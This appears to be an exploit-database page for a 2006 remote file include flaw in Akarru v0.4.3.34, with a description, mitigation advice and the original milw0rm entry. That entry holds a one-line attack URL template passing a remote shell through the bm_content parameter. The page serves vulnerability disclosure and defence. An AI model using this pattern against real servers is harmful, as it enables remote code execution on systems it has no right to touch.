header-logo
Suggest Exploit
vendor:
Akarru
by:
ERNE
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Akarru
Affected Version From: Akarru v0.4.3.34
Affected Version To: Akarru v0.4.3.34
Patch Exists: YES
Related CWE: N/A
CPE: a:comscripts:akarru:0.4.3.34
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Akarru v0.4.3.34 – Remote File Include Vulnerabilities

Akarru v0.4.3.34 is vulnerable to a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute arbitrary code on the vulnerable server. The vulnerable parameter is bm_content, which can be exploited by appending a malicious URL to the end of the request. This vulnerability can be exploited to gain remote access to the vulnerable server.

Mitigation:

To mitigate this vulnerability, administrators should ensure that all user-supplied input is properly sanitized and validated. Additionally, administrators should ensure that all web applications are kept up to date with the latest security patches.
Source

Exploit-DB raw data:

# ERNE ---- ERNEALİZM ---- BU ASK BiTMEZ----
 
# Akarru v0.4.3.34 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=2006
 
# Script  :  Akarru v0.4.3.34
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : B0tan, FearLesS, Liz0zim, EntRiKa, Dj_Remix, Di_Lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/akarru.gui/main_content.php?bm_content=[shell]

# milw0rm.com [2006-09-06]

Navigation

Suggest Exploit

Services By CQR